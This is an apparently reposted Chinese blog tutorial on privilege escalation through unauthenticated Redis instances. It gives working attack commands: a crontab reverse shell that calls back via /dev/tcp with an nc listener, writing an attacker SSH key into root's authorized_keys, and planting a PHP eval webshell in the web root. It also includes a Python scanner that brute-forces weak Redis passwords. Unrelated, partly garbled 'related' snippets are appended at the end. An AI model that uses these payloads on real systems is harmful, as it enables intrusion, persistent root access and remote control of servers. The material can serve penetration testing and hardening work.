2. 程式人生 > 其它 >redis提權——如果對方root執行,則容易中招,都是由於安全配置出問題導致

redis提權——如果對方root執行,則容易中招,都是由於安全配置出問題導致

阿新 發佈:2022-02-06

介紹:Redis是一個開源的使用ANSI C語言編寫、遵守BSD協議、支援網路、可基於記憶體亦可持久化的日誌型、Key-Value資料庫,並提供多種語言的API。它通常被稱為資料結構伺服器,因為值(value)可以是 字串(String), 雜湊(Hash), 列表(list), 集合(sets) 和 有序集合(sorted sets)等型別。

提權:redis未授權訪問從而進行許可權提升

第一種:利用計劃任務執行命令反彈shell

在redis以root許可權執行時可以寫crontab來執行命令反彈shell
先在自己的伺服器上監聽一個埠
nc -lvnp 4444
然後執行命令:

redis-cli -h 192.168.2.6
set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

這種寫shell的方式好像不是通用的,自己只測試過centos!

第二種: 寫ssh-keygen公鑰登入伺服器
在以下條件下,可以利用此方法
1、Redis服務使用root賬號啟動
2、伺服器開放了SSH服務,而且允許使用金鑰登入,即可遠端寫入一個公鑰,直接登入遠端伺服器。

利用過程:

1、本地生成ssh金鑰
ssh-keygen -t rsa

2、在存在未授權訪問的目標機上進行以下操作,寫入公鑰

192.168.63.130:6379> config set dir /root/.ssh/
OK
192.168.63.130:6379> config set dbfilename authorized_keys
OK
192.168.63.130:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx root@kali\n\n\n"
OK
192.168.63.130:6379> save
OK

3、進行連線

第三種:獲取web服務的shell
當redis許可權不高時,並且伺服器開著web服務,在redis有web目錄寫許可權時,可以嘗試往web路徑寫webshell。
執行以下命令

config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php @eval($_POST['caidao']);?>"
save

未授權檢測程式碼:

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import socket
import sys
PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
def check(ip, port, timeout):
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, int(port)))
        s.send("INFO\r\n")
        result = s.recv(1024)
        if "redis_version" in result:
            return u"未授權訪問"
        elif "Authentication" in result:
            for pass_ in PASSWORD_DIC:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("AUTH %s\r\n" %(pass_))
                result = s.recv(1024)
                if '+OK' in result:
                    return u"存在弱口令,密碼:%s" % (pass_)
    except Exception, e:
        pass
if __name__ == '__main__':
    ip=sys.argv[1]
    port=sys.argv[2]
    print check(ip,port, timeout=10)

參考文章:https://blog.csdn.net/fly_hps/article/details/80937837

相關推薦

redis——如果對方root執行容易由於安全配置問題導致

介紹:Redis是一個開源的使用ANSI C語言編寫、遵守BSD協議、支援網路、可基於記憶體亦可持久化的日誌型、Key-Value資料庫並提供多種語言的API。它通常被稱為資料結構伺服器因為值(value)可以是 字串(String),

語句 var arr=[a,b,c,d];執行陣列 arr 每項是一個整數下面得到其中最大整數語句

技術標籤:面試題javascript [不定項選擇題] 語句 var arr=[a,b,c,d];執行陣列 arr 每項是一個整數下面得到其中最大整數語 句正確的是哪幾項? A.Math.max(arr) B.Math.max(arr[0], arr[1], arr[2], a

【C語言程式練習】驗證使用者輸入的日期格式是否正確如果不正確提示重新輸入直到重新輸入正確為止

技術標籤:C++學習筆記C語言c語言visual studio 驗證使用者輸入的日期格式是否正確如果不正確提示重新輸入直到重新輸入正確為止。

解析正表示式的.*.*?.+?的含義

1. .* . 表示匹配除換行符 \\n 之外的任何單字元*表示零次或多次。所以.*在一起就表示任意字元出現零次或多次。沒有?表示貪婪模式。比如a.*b它將會匹配最長的以a開始以b結束的字串。如果用它來搜尋aabab的

假設R1、R2、R3採用RIP協議交換路由資訊且均已收斂。若R3檢測到網路201.1.2.0/25不可達並向R2通告一次新的距離向量R2更新後其到達該網路的距離是

假設R1、R2、R3採用RIP協議交換路由資訊且均已收斂。若R3檢測到網路201.1.2.0/25不可達並向R2通告一次新的距離向量R2更新後其到達該網路的距離是()。 A.2B.3 C.16 D.17

vivo T 系列兩款新機曝光:主攻線上T1 定位T1x 定位中低端

10 月 15 日訊息據博主 @數碼閒聊站 最新爆料vivo T 系列很快會上兩款新機T1 定位T1x 定位中低端。其中vivo T1 配色有曜影黑、電光青共有三種配置版本記憶體和儲存分別為:8+128GB、8+256GB、12+

【棧】設棧的順序儲存空間為S(1,m)初始狀態為top=m+1元素個數為m-top+1個。

設棧的順序儲存空間為S(1,m)初始狀態為top=m+1元素個數為m-top+1個。

Faker確診新冠!剛奪冠就T1官宣上野輔確診新冠

大家好這裡是三點二十五分給大家帶來英雄聯盟電競圈的最新資訊。 昨日在LCK春季總決賽上常規賽十八連勝的T1才以3-1的比分擊敗了陣豪華的GEN奪得隊史第十冠同時也宣告LCK昔日霸主的歸來以這支T1的陣容來看。

表示式$1$2$3

在replace函式$1,$2,$3可以分別用來表示: 正表示式匹配的第1、2、3個子表示式。

Linux曝Sudo漏洞 任意使用者亦可執行root命令

作為 Linux 最常使用的重要實用程式之一Sudo 幾乎安裝在每一款 UNIX 和 Linux 發行版上以便使用者呼叫和實施核心命令。 然而近期曝的一個提權漏洞卻直指 sudo 的一個安全策略隱患 —— 即便配置中明確不允

大量安卓 12 新手機受影響Linux 核心被曝 Dirty Pipe 高危漏洞:驍龍 8 Gen 1、天璣 9000 等新機可被惡意 root

3 月 9 日訊息Linux 核心由於開源性質可以讓許多人修改並重新分發。然而面對未修補的安全漏洞時開源就像一把雙刃劍。近日,安全研究員 Max Kellermann 發現了 Linux 核心的一個高危漏洞該漏洞被稱為Dirty

安卓 12 新機現 Dirty Pipe 高危漏洞可被惡意 root谷歌和三星推出修復補丁

4 月 9 日訊息今年 3 月份,安全研究員 Max Kellermann 發現了 Linux 核心的一個高危漏洞該漏洞被稱為Dirty Pipe(髒管道)編號 CVE-2022-0847可以覆蓋任意只讀檔案的資料並獲得 root 許可權大量新發

Kali虛擬機器利用msf17-010執行RCE(針對Windows Server 2008以及2003)

寫在前面: 老師上課的演示是利用了ms17-010的exploit/windows/smb/ms17_010_enternalblue,我們可以通過use exploit/windows/smb/ms17_010_enternalblue再info檢視適用於什麼版本否則拿這個去攻擊Windows Server 2

第十三章 使用者組的管理使用者許可權sudo

使用者組的管理 基本組-g#每個使用者只能有一個基本組 附加組-G#使用者可以有多個附加組​跟組相關的檔案 [root@lxy ~]# ll/etc/group-rw-r--r--. 1 root root 771 Dec 15 00:58 /etc/group[root@lxy ~]# ll /etc/g

20200811記錄:ansible sudo劇本變數資訊

--------- 1 案例1:配置sudo許可權 1.1 問題 本案例要求使用sudo提升普通使用者的許可權要求如下:

VS除錯執行web窗體檔案時遇HTTP錯誤404.3-Not Found 由於擴充套件配置問題而無法提供您請求的頁面。如果該頁面是指令碼請新增處理程式。如果應下載檔案。請新增MIME對映。

今天寫個web窗體檔案時剛開始隨便除錯一下就遇到這個http錯誤的問題就讓人頭大害! 問題如下: 於是上網找了一些原因楞是真的不明白這什麼原因,如果有大神知道的還望不吝賜教!!

try-catch-finally 如果 catch return 了finally 還會執行嗎?如果return返回的變數在finally被改變了返回值會改變嗎?

技術標籤:java 目錄 try-catch-fina分析 try-catch-fina try-catch-finally 如果 catch return 了finally 還會執行嗎?如果return返回的變數在finally被改變了返回值會改變嗎?

(Python基本語法)編寫程式執行後用戶輸入 4 位整數作為年份判斷其是否為閏年。如果年份能被 400 整 除為閏年;如果年份能被 4 整除但不能被 100 整除也為閏年。n

編寫程式執行後用戶輸入 4 位整數作為年份判斷其是否為閏年。如果年份能被 400 整 除為閏年;如果年份能被 4 整除但不能被 100 整除也為閏年。

在阻塞式io如果一個執行緒在等待io操作那麼cpu還會分配時間片給該執行緒嗎?

在阻塞式io如果一個執行緒在等待io操作那麼cpu還會分配時間片給該執行緒嗎?{執行就緒態阻塞態}

Delphi程式預設處理(以管理員許可權執行軟體)

從Vista以後的Window作業系統加入了UAC安全機制一些特定的操作需要以管理員許可權執行軟體後才能夠跑起來 (如: 修改登錄檔等操作)